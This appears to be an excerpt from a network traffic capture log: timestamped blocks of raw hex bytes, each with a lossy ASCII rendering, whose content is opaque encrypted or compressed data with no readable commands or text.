                                                                                                                                                                                                  2021-11-18 09:30:32 UTC811INData Raw: 7c b7 ed 50 3e ba 13 3b a9 3a ca e1 0c 88 c6 1c ac 0c 27 d1 2d af f1 ce 09 89 13 57 ec 5e 27 31 d3 7d 99 a4 f2 55 7a 32 d1 0d 92 bb 54 20 09 f6 75 76 6d 52 81 d3 09 fe 05 51 0f c7 06 23 e8 29 9c b6 a4 ac 6a d1 09 21 d8 7e cb 0b 09 f3 66 7c dd b4 a5 fa c1 a5 8f a6 13 03 31 db 89 de 76 2c 59 ca 51 8c 2b 20 ce b1 d4 a7 7f c2 9b 7f b0 1b 29 f8 cb 41 c3 d9 25 97 ba ee 8a 01 4e a3 5b 05 29 d2 21 cb 84 c8 36 95 99 6a f2 54 49 2c 93 26 fc 72 62 e0 47 43 24 27 c2 ca 75 22 31 d2 75 4c 78 4c 0f 3f 92 53 04 b9 2d 96 13 b5 2d db a7 18 d5 14 63 97 de cb 4f 80 0f 22 59 84 6d 9b 76 27 77 a2 8a 21 ca 55 41 db ea 6e 67 3c 8a 3b 1c 2d 28 d4 97 ce e1 b7 19 57 c2 23 a8 28 f2 63 82 dc df 53 15 12 35 33 9a d0 b3 de c2 c2 98 2d e6 45 88 09 c6 ba 78 e9 3b fe 31 df 37 e2 f0 e1 0b
                                                                                                                                                                                                  Data Ascii: |P>;:'-W^'1}Uz2T uvmRQ#)j!~f|1v,YQ+ )A%N[)!6jTI,&rbGC$'u"1uLxL?S--cO"Ymv'w!UAng<;-(W#(cS53-Ex;17
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC827INData Raw: d1 d0 92 bb 13 5b 52 63 8a 35 4a ad 16 2b 3b 4d 0b 2b 17 59 33 93 c6 ae 28 4d f6 4e c5 2d 71 2a d5 72 8a 7f 4c 73 4c 41 47 be 25 ea 9a 58 55 ea 3c 67 77 27 7f 9a e0 77 5e 34 64 75 a2 6e 4c e6 51 0e 28 55 c5 e6 1c e2 db d7 bb 65 78 ee f2 ea 96 ba 8b 6c 76 b3 f1 bf 2e c5 7a 6b d5 cc 2c a2 ed 14 c2 97 d5 14 96 b0 31 82 c2 45 3e b4 52 ee dd f7 18 bf ea 96 54 ca c9 66 de d6 b5 fe 73 14 1c a0 b3 09 e4 ab ac fc e1 e9 b2 2a 84 df 98 ee 89 5f fe 34 1a 10 b7 57 8e 0f ab d0 7f a4 6e dc a8 86 a1 e6 49 2a 9c d8 1c 96 60 52 55 18 ca 0f bf ca 56 fe 25 42 ce 3c d1 a6 48 70 64 de ad e9 93 57 68 53 a5 eb 2c 49 07 97 6e f2 94 84 24 47 5a 62 6e 56 58 68 8e 48 70 20 83 bd fb 3d a6 0d 4a 79 49 de 4e 92 04 8a 94 5c 1f 5c df b0 17 e9 68 93 bb 2d 56 bd c9 a9 7c 7e 78 51 90 52 12
                                                                                                                                                                                                  Data Ascii: [Rc5J+;M+Y3(MN-q*rLsLAG%XU<gw'w^4dunLQ(Uexlv.zk,1E>RTfs*_4WnI*`RUV%B<HpdWhS,In$GZbnVXhHp =JyIN\\h-V|~xQR
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC843INData Raw: 07 fe 51 89 00 e1 53 bb d2 b1 ff 7d c1 2c e3 04 f3 00 24 1d fb df 01 d9 79 5b 4a e9 be cd bd 2b 92 e8 2c 0f d0 27 f6 fc 06 50 31 ff 5f c2 cb 0a 40 67 89 4a ce fa 8e e4 00 09 36 e5 1c d3 bc d7 00 5d 7c f1 3d 51 a8 12 58 09 57 ff 6f dc 99 3f e9 d8 3d 3f c3 0a d6 d4 2f 81 d9 ca f0 58 4c 61 2a 18 3e 81 23 84 0a d2 d8 27 1f 97 05 01 87 0b 07 86 fa f8 ae 24 9a b3 10 44 4a 1a c8 28 e8 75 04 0f b6 17 c8 8e 69 88 33 16 b9 26 11 35 7a 4d 13 87 25 69 53 bb 10 35 80 29 f0 2b e4 77 97 5b c2 0a 31 10 28 26 c0 a1 4d e4 06 21 b7 07 44 1b 0e 3a 03 33 ee b6 97 3d 33 d1 46 03 14 01 8d 67 61 61 2b e0 16 e1 5a 42 18 17 29 77 24 37 13 0b 05 51 24 04 f2 a3 07 8a 57 1b 66 29 63 5d c8 01 84 c7 5d b6 24 5b 80 98 3d 2f 37 24 54 66 56 06 75 e6 01 40 72 d8 02 f9 88 cb 80 e3 1f 77 11
                                                                                                                                                                                                  Data Ascii: QS},$y[J+,'P1_@gJ6]|=QXWo?=?/XLa*>#'$DJ(ui3&5zM%iS5)+w[1(&M!D:3=3Fgaa+ZB)w$7Q$Wf)c]]$[=/7$TfVu@rw
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC859INData Raw: 84 fb 43 12 06 67 e8 29 18 08 15 13 0a c0 31 80 7e 94 16 4e 4b 8e 0b d2 f8 00 12 40 74 b4 fd 24 5a 70 74 1f c4 07 46 8f 9e b0 15 d6 e8 1c 76 6b 09 0b 21 ab 6c 00 8c d9 22 7d 93 00 f4 b5 cd 01 4e 97 e7 fd 0b 87 48 3a 6e 87 4e 58 49 0e 4c c2 eb 34 7d c1 9a 2a d8 0f 43 00 de 27 80 96 e5 a6 ca fe 76 4d 0e ef 05 78 39 c0 81 d0 19 6f 85 fa bf 0f d8 0c a7 f0 8a 63 f4 02 89 bd 1c 65 dd ca 58 60 a2 b0 f9 00 42 58 a7 68 33 67 aa f3 00 41 57 d3 94 ab df 51 9a 2c e8 fe e2 3b 00 85 20 69 bc d2 4b 0c ec 54 fe e3 00 2d 43 91 52 fd 31 7f a3 00 56 6a e9 8c cd 51 94 f2 26 99 34 5a 40 71 2f f3 d6 0a e9 3a 64 2c b2 0b 1d 11 80 ae 24 8f 15 27 00 40 98 13 62 16 3a 93 0d e6 17 00 6d 70 c8 24 3d 69 79 5f 7c 9f 00 28 5d 96 73 05 b8 e9 74 31 07 3f 50 c6 24 97 5a 64 40 fa 68 38 78
                                                                                                                                                                                                  Data Ascii: Cg)1~NK@t$ZptFvk!l"}NH:nNXIL4}*C'vMx9oceX`BXh3gAWQ,; iKT-CR1VjQ&4Z@q/:d,$'@b:mp$=iy_|(]st1?P$Zd@h8x
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC875INData Raw: 37 0d 29 c8 ba 95 d7 bb 11 4a d4 89 25 29 71 0c 80 21 d8 e1 c0 96 b4 69 76 52 68 ae 53 f2 32 c5 51 2d 42 ab f1 77 42 cf 1f fb fc 2d 69 4a b8 38 69 a4 ee 0d 4a cf 66 db e6 9e 81 8a 45 02 36 11 df 21 3e 04 a9 66 39 66 d7 18 a2 5e 89 e9 f6 be ca 1d 70 09 11 15 21 c0 05 c9 81 94 0f 85 23 29 24 d4 71 6b 70 d7 b1 7b e9 eb e5 67 2b c5 d0 b3 96 60 58 d7 0f 85 1d bf 9a 1e 09 ba 5e 2f ed 64 46 02 5c 86 2c 6b f0 5c c7 13 a5 99 03 3a 2a 94 94 84 ed bf 01 2d aa ad 8f 0a 7e f2 5c 97 ee 73 d4 0f 87 08 af 5e d2 16 58 ad bf 93 64 01 bf bc 2a d3 99 c9 3f b6 bb 58 4e a1 e6 04 78 49 b5 ae 31 0c ca 20 39 a7 8e d7 49 c6 5f 6c 88 7d c2 aa 6b c2 36 d5 30 c5 df 2b 7c 0b 9d 4c 76 95 05 8d c7 98 d2 21 16 d7 09 0e a8 52 5b 8a 78 53 9c 5b 92 7d c2 57 16 ae 9d 5f 94 45 b7 09 87 fb 0d
                                                                                                                                                                                                  Data Ascii: 7)J%)q!ivRhS2Q-BwB-iJ8iJfE6!>f9f^p!#)$qkp{g+`X^/dF\,k\:*-~\s^Xd*?XNxI1 9I_l}k60+|Lv!R[xS[}W_E
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC891INData Raw: 0e ca 32 38 35 2e e3 7e 3c 52 fd 9e 16 66 56 be 91 f3 85 8b 10 ff c2 88 c4 1a 11 11 50 58 19 18 16 ff d3 90 fa 8b 56 5b a8 84 e2 14 d6 b1 c9 df b2 c6 56 51 e2 31 d6 dc dd ef 4b 32 80 c5 1b d0 ce 24 94 a8 e5 09 ae da 65 24 11 2e d1 0a 3c a2 a2 44 20 01 0f 68 21 28 15 64 83 00 2c 24 53 bb e9 9a 75 55 f2 5c 95 57 32 76 a8 c2 c1 84 77 23 1f fc 26 00 88 29 8c c4 80 32 f9 27 45 08 e1 62 69 3b a0 5a f3 09 33 63 59 1a 80 d2 5d ee 54 6a 0e 2a 41 d7 91 03 97 82 3b 27 21 d2 fd b9 52 8e 6a 21 88 7d 74 82 78 dc fb 90 d5 e4 4a 7d a7 38 1b 55 0f a1 5d 11 04 5b 49 b0 fb 66 61 67 1a e9 d0 ea 2c c0 16 7a 0a 09 ea f0 5f 4e ca 00 b4 ca 3d fe 12 46 86 cf 07 2c 42 bf 80 96 c3 65 ae e8 14 63 24 fe 7a 00 15 5e b9 cf 41 02 0c 40 00 8f d8 e7 fd 60 21 39 6d 8c 1e 7c b0 f0 cf 48 5e
                                                                                                                                                                                                  Data Ascii: 285.~<RfVPXV[VQ1K2$e$.<D h!(d,$SuU\W2vw#&)2'Ebi;Z3cY]Tj*A;'!Rj!}txJ}8U][Ifag,z_N=F,Bec$z^A@`!9m|H^
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC907INData Raw: bd 3d 02 95 11 31 12 61 f9 40 27 2d 1e 80 48 5f c7 a8 50 20 1c 99 0c 88 05 a5 18 96 d2 1c e0 97 42 72 88 03 f2 eb 18 20 2d 1d 3e b1 e4 3e 84 03 05 e7 ff bc fe 9d 08 88 0a 80 fb 5a 6c bb 3d 30 03 9d c3 68 77 3c ba 85 30 01 e9 25 20 92 2d 37 27 4a 98 a3 d4 49 08 15 ea 86 1b 04 a7 d5 1c 06 f4 22 1f 30 37 97 33 b3 9f 19 80 a0 0d 40 06 96 62 2b 65 ac b0 58 cd 33 4e 3e ac 5d d8 2d 1f 14 a3 84 33 86 e0 68 57 e5 0f 4e 55 83 3a ce 18 1b 25 14 51 82 9c 82 88 bf 40 bf db 0b 3f ad 91 99 ff 5a ab c4 c7 18 0a 23 4e 30 48 d7 e4 49 02 84 f1 1a 59 51 7e 90 bc 91 11 24 cb 42 08 02 92 01 e0 ec c0 19 06 a0 c0 da b2 4d c5 d1 55 2d 6b e2 56 05 50 30 23 80 c4 ff 3e 81 1d f0 75 66 73 3e 0c a1 e9 fc d5 f0 b8 b1 52 3d 16 e7 2a 07 81 d1 ef 7f 0c 13 1c 01 7e fd 3c af f5 70 63 42 dc
                                                                                                                                                                                                  Data Ascii: =1a@'-H_P Br ->>Zl=0hw<0% -7'JI"073@b+eX3N>]-3hWNU:%Q@?Z#N0HIYQ~$BMU-kVP0#>ufs>R=*~<pcB
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC923INData Raw: 3a a2 01 16 ed e8 48 e4 e2 7d c4 1c 35 40 ce f9 48 c6 b4 88 fe a0 11 0f 86 08 14 01 f2 ef 07 66 38 c7 54 64 ea 24 ae 24 30 af 12 82 99 70 37 05 69 ac 76 0e e2 c1 1c 5d 15 89 09 31 da 62 d6 77 b0 cc ee 21 56 db 88 5b bc a4 3e de 27 d3 4c f7 9d d5 10 b7 2b 38 92 12 5f fa 72 ca 20 11 f3 2e f0 98 c9 59 1c b5 a2 e1 7c 3f 58 36 67 13 a4 56 04 8c 4f d3 a1 20 3a 14 ba 16 ec a2 81 e8 0b 00 fb 56 3a 2a b9 29 79 a9 56 61 13 13 09 0b bf f6 35 8d f6 04 2f ec f7 4d 1b c4 c3 40 53 a0 6c 11 5f 47 af 34 3f e8 a7 89 3a f3 d6 8b 29 c3 dc a6 41 ee e5 e8 3e d4 36 1a e4 20 54 20 3a 58 09 41 bf 34 ab cb 9d f6 86 52 4e 7e 96 df 69 09 7f c1 23 cb 3a fc 44 a5 09 26 3a 77 d1 2d 25 0b 41 1a 66 42 8c 58 fa 4a 9c ab 62 53 ba 87 42 29 db 5d 30 42 31 d6 97 79 fc 45 ef 12 4d 64 c3 cd 50
                                                                                                                                                                                                  Data Ascii: :H}5@Hf8Td$$0p7iv]1bw!V[>'L+8_r .Y|?X6gVO :V:*)yVa5/M@Sl_G4?:)A>6 T :XA4RN~i#:D&:w-%AfBXJbSB)]0B1yEMdP
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC939INData Raw: 04 82 17 e9 5b a5 52 01 a3 0a 78 52 63 85 c9 ee 46 54 86 b8 59 c2 bf 93 f6 7c 2a e6 06 f8 67 b5 14 ff 9b be a7 7f 47 e9 1f 17 8b e6 9c 66 99 2c ee 63 71 5a 44 5e 4e 1c cb 10 5b cc cf ce 4c 28 af b4 f8 e7 7e 9e f8 69 42 79 57 d4 8e 27 94 ec 21 ee 49 a2 53 9d 89 07 46 15 7a 21 b3 00 12 29 85 eb ab 92 a7 a8 d6 36 52 e2 2e 65 3a 2d 30 bd ce be 89 09 2c 16 3a 89 72 a9 94 3c 2c 6c a5 9d 8e a6 92 a2 e9 4a 92 0c 88 c6 be e7 6e 29 d5 0c 17 f6 b4 6c cb 64 89 98 6a 9c 5c ed 1c 22 06 d2 13 12 2d ed a5 40 19 95 31 51 c9 bf 01 3b 29 d4 2b e9 af 93 e2 bf 26 c7 f1 c2 01 d7 7d 76 58 cb 7e c6 3d 25 67 65 1a 04 01 c7 09 ee bd bd 93 e2 0e 4a fb 5e f1 92 a8 b2 c0 87 21 df e4 c7 aa a8 c4 a4 ab 34 f0 af f9 9e df a5 d7 6c 43 f0 ef 52 ac 08 7a 91 19 c7 e6 b9 c5 71 bb 26 63 a9 5a
                                                                                                                                                                                                  Data Ascii: [RxRcFTY|*gGf,cqZD^N[L(~iByW'!ISFz!)6R.e:-0,:r<,lJn)ldj\"-@1Q;)+&}vX~=%geJ^!4lCRzq&cZ
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC955INData Raw: be d0 68 98 92 63 d9 44 6f 64 c6 17 a3 a9 69 92 c5 77 ee b2 9e 89 06 d3 e1 27 c1 d2 80 2a 8e db 25 04 71 fb 6f 89 dc 5b ef 26 5a ca 38 a7 5b 37 af 70 93 99 44 49 55 cc 56 b3 e2 27 7e 45 49 ff 11 c1 ee 3a ac 74 a3 31 f6 2a 9d c6 6a 5b 16 5a e6 ba f5 64 33 98 9d bf f3 15 2e ff 12 90 f2 9e 92 ba 99 3a 7b e3 04 89 21 42 a1 50 78 f0 3c 97 1e 7d 21 ee 63 a5 0b 7a 94 60 27 2b 1f 7e 4a 13 d6 ed 75 ca 64 2e 48 9e 2e 5c e9 46 7d b0 00 bd 51 10 eb d9 c9 89 c6 02 5b aa a5 6a 66 f0 dc 8c 33 0a 29 f6 8b 07 af 25 75 b2 a0 57 53 3c 22 b6 9c e6 50 c7 76 8a f7 ca 26 77 32 fd 55 d9 af ad d4 9b 93 04 8b 19 4e 62 92 11 e5 d9 ad fe 49 13 f6 e8 dd b4 b9 9c 9a c4 f5 66 a3 95 fc c7 4f dc 29 a6 4b 70 63 95 8b bd b2 c1 4a 3e df e5 3f 12 64 ac 78 d0 e6 9e ee c0 c5 de fb 9d 7b 6a a4
                                                                                                                                                                                                  Data Ascii: hcDodiw'*%qo[&Z8[7pDIUV'~EI:t1*j[Zd3.:{!BPx<}!cz`'+~Jud.H.\F}Q[jf3)%uWS<"Pv&w2UNbIfO)KpcJ>?dx{j
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC971INData Raw: ad b0 46 79 f2 63 a4 6f 8b 7d 5b 2e a1 81 2a 99 c9 63 68 6b fa f4 ab 2f 76 b0 7b b2 75 56 b6 5a 18 b8 09 ce 93 22 18 33 c0 ee 0f 95 45 60 04 09 d6 be 59 b1 21 a2 d2 e1 ef 53 29 29 e7 e4 de ae 35 d2 eb 83 a1 ee c4 ae 2c a4 e6 bb 0f 11 9c 77 2f c1 b4 c2 39 d4 a6 60 89 d6 21 c6 97 46 41 12 0f b6 f8 10 a2 fb 4a ab 09 4f 80 71 ac 4d 50 2a ec 61 d1 95 8d 31 3e 30 d2 b7 5a f8 f9 ff 8a 80 8b ee 4b 7f b2 45 e1 5f e6 6b a8 45 a4 ab 31 c6 f8 9c 52 dc 0a 51 6e 62 c2 6d 57 94 ca 27 8a 02 c9 30 44 11 29 d6 2b bd ea 24 ef 75 69 08 12 b5 5a 5e 76 13 ef c9 5b 71 b0 6f 75 d3 af 0b 9a ea fd 66 a2 12 3a e9 42 9d 0f 7f e8 26 5f a9 d6 d4 73 d6 ba c9 3e 55 b9 98 a6 31 93 2c 92 ce e5 fb 2a bf 2c 23 3a 90 30 95 4e 3a 97 18 05 be 9c 16 90 51 77 ad 63 c4 01 33 ee 61 01 21 30 6b ed
                                                                                                                                                                                                  Data Ascii: Fyco}[.*chk/v{uVZ"3E`Y!S))5,w/9`!FAJOqMP*a1>0ZKE_kE1RQnbmW'0D)+$uiZ^v[qouf:B&_s>U1,*,#:0N:Qwc3a!0k
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC987INData Raw: 09 fd 38 10 d7 c1 b6 f2 ca 6f c8 24 94 e9 c2 d5 59 c9 a5 7c 24 64 d9 ab 82 c6 c9 7c 34 c2 f1 40 73 bf a5 f1 1e af b1 fc 91 52 6e dc 71 8d 62 ee 9c 2a 7c 0b 8b 1f 22 a0 c1 49 2f 8b de f7 66 31 54 ce b2 c1 9d 46 dc 90 07 95 fc a1 9b d1 c4 92 c9 5f 7b 4d 08 01 d6 2c c0 48 c8 11 a8 16 31 de cc de 21 1a fe 01 eb 84 74 a7 6b 7c 93 14 f1 cd ca e9 6a 81 c3 72 24 47 36 6f a7 f7 68 bc 48 4d 1d 0b 9d 4a 89 be 2b a0 89 1f 9f 5d 98 6e fe 8b 14 1a 31 c9 65 89 be d4 cc 5a a9 96 65 f1 0c 09 d1 a1 c6 44 1c 01 f5 6a f6 dd 15 f1 45 24 21 11 21 62 3e 2b c5 a0 25 fc 80 63 c1 3c 2f 0d 2b f5 14 fa 86 e0 bf 5e 9c 9b c9 48 4a a0 e9 55 92 14 20 2e e1 ce 65 11 89 c6 2b a3 78 41 9d 7f 85 db e3 15 5e e3 f5 40 75 21 4c d1 04 4a af 62 0c dc e6 38 9d 5f 32 63 71 26 2d d8 47 b7 e6 fd 25
                                                                                                                                                                                                  Data Ascii: 8o$Y|$d|4@sRnqb*|"I/f1TF_{M,H1!tk|jr$G6ohHMJ+]n1eZeDjE$!!b>+%c</+^HJU .e+xA^@u!LJb8_2cq&-G%
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1003INData Raw: 58 b7 18 6e ce b1 08 0c ff 10 d9 17 14 28 1e 7f 23 13 17 62 e6 c6 02 24 c5 c0 ef 29 4d 25 02 a2 7e 57 83 b3 e9 21 51 75 f4 26 3b 30 3a 0a a3 df 9b 40 3f 4d 10 17 a0 b3 a2 5b 4c 16 38 3d b0 b1 23 fe 95 1c 89 34 59 42 0c dc 62 96 e2 8d 97 77 94 9c 08 da 31 22 26 58 2a f7 12 c8 b6 07 ff a2 34 d2 a7 7d 2b 0e 30 3c 25 0a f7 b8 4a 03 21 4e ff bd 71 d0 8f 4f 8a 0f 27 c6 c6 62 c9 38 89 d7 89 fd d5 04 43 c6 a8 11 df 96 ca 8c f7 09 4e f7 af 32 32 f2 fc 39 64 29 f0 d7 c5 88 09 df 95 7f 9a d4 5f c2 4d 75 16 4a 4f f2 ee 2d c5 2b 35 62 b8 f8 d6 f3 9c 10 e6 02 96 bc 84 b3 bf 84 ac 0f a4 fa bd 8d 91 53 25 d7 d5 e6 16 27 f2 15 65 9e 09 21 df 5f 6c fd 82 06 fd d0 c3 5f 21 ba 74 4d aa e8 da b1 f2 9c 54 62 44 4c c2 be 57 fb 31 02 89 df 4c 1a ea 5e a8 cc 58 ca 53 68 cb 17 01
                                                                                                                                                                                                  Data Ascii: Xn(#b$)M%~W!Qu&;0:@?M[L8=#4YBbw1"&X*4}+0<%J!NqO'b8CN229d)_MuJO-+5bS%'e!_l_!tMTbDLW1L^XSh
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1019INData Raw: e1 40 eb 3e bb 3d 6c 08 2c e2 4c 0f 3c b4 a0 f7 2b 02 8a 66 97 5f 31 d9 57 1b 4f c2 d1 d7 98 fd ee 29 4e ca b6 dc 4a fc c1 c6 33 06 b4 b5 e5 28 25 5f 66 59 a0 77 29 d1 d2 60 d8 d5 e3 42 3b 5a 84 6d bb a8 95 c9 c7 5c 0a 6e 49 c3 e6 15 2d b9 0a 94 f8 0b 21 c1 89 06 d3 62 a0 96 bd 16 fd 22 e3 68 9f 50 b2 58 d0 3b 4e b8 a2 c4 01 d8 ba e8 48 c5 c6 05 09 4c c0 7d 9a c2 c1 ba 16 3c 6a 7b 44 75 0d bc 02 c2 f1 11 51 13 88 c6 38 97 35 32 a8 f3 ff e5 7f 17 c1 c8 b0 db c5 20 25 dc 4a 4c 69 6c ad f9 7d 09 c0 05 b1 5a 63 14 c0 fe 03 16 31 25 d3 be c6 8c 2a 2d ac 07 a9 dd f0 c9 c8 f6 44 c2 25 05 45 65 7f 94 c1 67 29 25 9a 89 cb 64 65 4d 25 c6 56 2e 11 2d f0 64 d0 a3 da 58 5b 4a fb dd f0 2b b6 dc 4b 20 9f 03 d0 1a 27 61 6d 5f 32 e9 55 19 1b b9 44 79 ef 85 54 16 a1 e2 06
                                                                                                                                                                                                  Data Ascii: @>=l,L<+f_1WO)NJ3(%_fYw)`B;Zm\nI-!b"hPX;NHL}<j{DuQ852 %JLil}Zc1%*-D%Eeg)%deM%V.-dX[J+K 'am_2UDyT
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1035INData Raw: 80 b9 76 93 fa ca 44 4f 84 8b bb 16 43 b3 6b 5a 18 9f c5 ee dc b5 16 58 91 65 b0 2e 27 89 fe cb 0a ac e6 9b 4f 21 af ca ee 4a f9 c1 8b 0f 96 ff 95 89 26 71 a1 c5 1c e8 05 a1 8a 17 2b 35 bf a1 8d 09 8c 2e e2 39 c9 ee 5c c4 5a 5e 2c 49 75 e5 bb 14 c6 25 2d 8b 7f 12 07 6c 75 99 d2 96 29 ab 8a 8f 5a 24 16 fe f4 50 e7 5f 99 28 77 33 16 0e 01 f7 ab 9c 14 c7 b4 bd 4b 7e 62 c9 57 24 09 04 a8 3a a4 fb e3 b8 26 65 5c 72 cc ad 95 c2 d6 fd bb 4f 4f b6 be 72 b9 ef 59 3c c7 c6 6a 34 52 51 c1 27 df 29 b8 77 e2 d5 1b 60 b4 ab e2 07 93 bb a5 17 e9 a8 54 4f d8 85 f7 5c 67 62 a4 bb d9 e3 2b 84 24 f9 1a d7 f8 53 d7 ec 78 f4 eb b9 26 99 b1 29 ea 90 41 e7 15 bb 4f 26 d9 a7 ce 8a 95 51 54 69 d3 b3 a7 1a 18 70 ac be 8f 5a 5d d1 d4 be dc a2 d3 0a f7 f7 61 62 e7 75 79 cf 88 cf dc
                                                                                                                                                                                                  Data Ascii: vDOCkZXe.'O!J&q+5.9\Z^,Iu%-lu)Z$P_(w3K~bW$:&e\rOOrY<j4RQ')w`TO\gb+$Sx&)AO&QTipZ]abuy
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1051INData Raw: 67 2c c2 b2 99 7e 5f 52 c9 2b ee 78 4c b4 a9 a5 96 85 f0 fb 99 94 04 a2 8b 6b 55 60 33 9c 92 fb 8b c9 4d dc 5a cb 3b 7c 52 02 a4 97 a3 64 9e a5 09 a5 ea e8 57 5e 30 53 84 ea a2 4b c4 f9 01 60 28 c3 9c 5f be e8 fc b2 89 5d 4c a3 95 79 88 64 f9 bb f8 7f e2 fa d5 6f a7 b6 2b 7c b1 48 62 89 f6 a5 22 d0 bc 34 a2 be 5b bb 28 17 8c 0d b4 e8 25 7f ea 04 71 74 c9 f9 d1 c5 50 b8 c0 b5 aa 13 18 f2 dd cb 24 1c 3e 76 ce bc f5 e9 d6 4d eb dc 9c 16 de ca 7f 25 40 c5 9b 16 09 fb 75 91 a3 79 12 f6 40 61 b2 c6 c5 6c 73 f1 e6 04 14 a3 84 69 7a a2 7e c6 ac d9 97 49 7e 5a 93 64 8a 72 5a aa 32 12 cf f5 da ad 27 c2 32 e5 5a 2f f7 b3 a0 c0 ff 8a 1a d2 54 fc eb e1 ef be 2b 75 9c aa 04 9e c3 2d ba f6 b1 2d 3b db ef 23 9d b2 9b c7 dd 51 c7 69 54 be 6d be 22 4b c4 8a 02 f9 bc d2 67
                                                                                                                                                                                                  Data Ascii: g,~_R+xLkU`3MZ;|RdW^0SK`(_]Lydo+|Hb"4[(%qtP$>vM%@uy@alsiz~I~ZdrZ2'2Z/T+u--;#QiTm"Kg
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1067INData Raw: 55 10 c9 ce ac b1 40 69 d7 7b 13 8a c7 6d 66 e9 75 e5 bb a7 46 3e bf 5b 64 26 79 93 30 2d c0 27 27 4e 89 54 17 af e5 65 32 4d a8 1a 74 50 c5 62 24 37 99 83 7b ac fc c9 49 d9 9d 44 01 17 ef 35 48 fb c4 f2 e9 67 d6 bb 91 16 ee 75 62 09 c5 be 0a a8 7a a4 ba fd 72 a4 ee 32 aa f6 c3 d0 97 a7 31 49 8e 13 5d ad 75 ba e6 7f 92 13 ff 6e 28 5e 9c 29 da 3f 32 6f 8a 5d fc a5 09 ce 30 51 33 4b 0b 80 74 d2 c5 de c4 81 ab f2 17 12 2c 3c 21 31 49 01 2b cb b3 4a ba 56 c0 13 36 2d 16 06 a2 dc b7 f6 7b e8 12 a6 bd 2c 18 e5 e6 be 2d a3 25 55 7f 74 85 c5 ec 84 23 f2 51 4c 9c 4f 2d 0a 3c eb d7 f8 43 41 91 ac 3c 2b cb 7f c2 c4 cb a1 b2 0f 96 f4 09 f7 d3 39 ca 77 58 e1 29 ce 3c 6e af 99 4b 6d 14 84 b0 ba bd 63 93 34 5d 32 c6 31 75 fb c4 13 50 f2 ec 93 e6 00 4e bb 84 76 f8 ae a5
                                                                                                                                                                                                  Data Ascii: U@i{mfuF>[d&y0-''NTe2MtPb$7{ID5Hgubzr21I]un(^)?2o]0Q3Kt,<!1I+JV6-{,-%Ut#QLO-<CA<+9wX)<nKmc4]21uPNv
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1083INData Raw: c7 11 5a b1 fc 1c d3 88 fe 89 4b ef bb 32 f7 de 75 98 b2 0d 04 a0 17 1f 21 5a fe a3 b5 78 5a df 16 b7 a8 06 2d 80 9a 6a 89 28 5e 08 52 09 ca 5d 79 42 62 8b 12 f7 19 ed c9 6d 30 93 ea 9d 72 7f cc 88 f1 bd 4c d9 9d df 92 0c 69 b6 30 72 fb c4 31 c6 ab 32 9a 33 d7 db 29 0b c6 c5 9a c7 fd 72 a8 8a d8 9a 97 77 9a 57 e4 0c b5 ec 7b 2a c9 be 58 97 10 49 ce 2b 5e 02 a7 ab 0b 01 ff 21 56 91 34 1c ef 62 f7 e1 12 75 88 66 3e e9 7d 82 fb e6 a8 56 6e 5b b7 e0 22 a2 13 76 51 2e 30 3b af 29 00 73 19 41 90 62 75 5e e1 a7 18 ba c1 4a 11 e2 81 d6 bc 4c c4 f7 3c a2 45 9a ac fd ba 22 20 70 32 88 85 3f 74 55 12 c3 01 d1 fe 89 7b 54 b4 ab b3 95 2a ce 65 28 c9 3b 15 25 f3 77 d4 8f c1 f6 24 f0 2a a6 4a 4b b2 d1 13 01 fe a8 ad c2 c0 e8 04 42 cc 55 4e a1 91 30 85 fe 34 b8 12 89 eb
                                                                                                                                                                                                  Data Ascii: ZK2u!ZxZ-j(^R]yBbm0rLi0r123)rwW{*XI+^!V4buf>}Vn["vQ.0;)sAbu^JL<E" p2?tU{T*e(;%w$*JKBUN04
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1099INData Raw: b6 08 29 ee 68 79 23 89 2f 50 21 5b 30 8a b1 49 42 96 5a 5e 8b 7f 6d 1d 28 cb d6 2a ba 4b 48 99 34 40 2f e6 01 94 72 97 fe 62 58 8a 1f 90 82 b7 25 9e f0 bd 25 89 04 c6 2b b7 db 8e a5 ff ae b1 57 ad c7 d3 57 f1 8a e0 6a 34 8e 2d da 90 48 ac fe b7 f5 68 99 de 34 11 fe b4 15 cb 74 25 c9 46 cf 2e 29 d7 4a 26 e1 12 15 8d 02 6b 96 cd 1e b7 51 f6 4b d8 65 b9 8b 4b 89 39 ee 83 9e 0d 97 90 62 c8 d7 59 b9 82 8b 0e 29 ff f7 44 72 bf 1b 40 b2 90 79 c7 9c c6 62 96 3c ce c8 65 42 e7 f0 24 03 bf 89 74 6e a3 4c 9f 12 ac ac 0f a4 f1 80 38 8d a4 eb ac ea 14 2b 0e 2a d3 ee 22 c0 29 f7 cc 61 4e 5d 8c a8 ef 45 a8 71 71 2e c9 25 73 67 d2 bf 29 48 2f f2 e3 d3 ff 99 04 04 4d eb 92 42 02 45 0b b6 50 ce bd d3 82 89 31 c7 ec d6 4a 0a 24 d9 a3 59 7d b5 59 5b 6a 1d 2d d6 3a c5 df ff
                                                                                                                                                                                                  Data Ascii: )hy#/P![0IBZ^m(*KH4@/rbX%%+WWj4-Hh4t%F.)J&kQKeK9bY)Dr@yb<eB$tnL8+*")aN]Eqq.%sg)H/MBEP1J$Y}Y[j-:
